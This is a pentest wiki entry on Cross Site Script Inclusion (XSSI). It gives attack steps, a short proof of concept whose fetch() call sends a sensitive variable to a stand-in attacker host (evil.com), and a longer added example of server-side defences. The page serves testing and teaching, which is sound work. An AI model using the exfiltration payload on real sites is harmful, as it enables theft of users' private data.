Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Cross Site Script Inclusion (XSSI)

POC

1. Try to find a JS file that includes sensitive information about the user.
2. Look at the HTTP GET request for the JS file to make sure that it doesn’t require CORS-triggering headers such as Authorization, X-API-KEY, X-CSRF-TOKEN, X-whatever.
3. If it does require those headers, the attack will fail unless you find a CORS issue.
4. Use the following PoC to exploit:

    // var_name is a variable in vuln.js holding sensitive information
    console.log(var_name);
    // sending information to an attacker controlled server
    fetch("https://evil.com/stealInfo?info="+var_name);
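The defensive counterpart to the steps above, as an added example that is not part of the original wiki entry: a server-side check that refuses to hand user-specific data to a script include and requires a custom header that a script tag cannot send. The function names, the choice of X-CSRF-TOKEN as the required header, and the sample requests are assumptions made for illustration.

```javascript
// Added example. All names here are hypothetical; sample requests are constructed.
const REQUIRED_HEADER = "x-csrf-token"; // assumption: the app's fetch() calls send this

// Header names are case-insensitive, so normalise them before lookup.
function lowerKeys(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value);
  }
  return out;
}

// Decide how to answer a request for a resource that embeds user-specific data.
function guardSensitiveResource(rawHeaders) {
  const h = lowerKeys(rawHeaders);
  // Fetch Metadata: browsers label a <script src> load with Sec-Fetch-Dest: script.
  // User data should never be handed to a script load, least of all a cross-site one.
  if (h["sec-fetch-dest"] === "script") {
    const site = h["sec-fetch-site"] || "unknown";
    return { status: 403, reason: "script include (" + site + ")" };
  }
  // Browsers without Fetch Metadata: a <script src> include cannot set custom
  // headers, so requiring one blocks the include. Token validation is out of scope.
  if (!h[REQUIRED_HEADER]) {
    return { status: 403, reason: "missing " + REQUIRED_HEADER };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json", // data, not executable script
      "X-Content-Type-Options": "nosniff", // refuse use as a script on MIME mismatch
      "Cache-Control": "no-store",
    },
  };
}

// Constructed sample requests: a cross-site include, a legacy browser, the app itself.
const samples = [
  { "Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "script", Cookie: "sid=constructed" },
  { Cookie: "sid=constructed" },
  { "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Dest": "empty", "X-CSRF-Token": "constructed" },
];
for (const s of samples) console.log(guardSensitiveResource(s));
```
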

Impact

Medium-High

Likelihood

Medium-High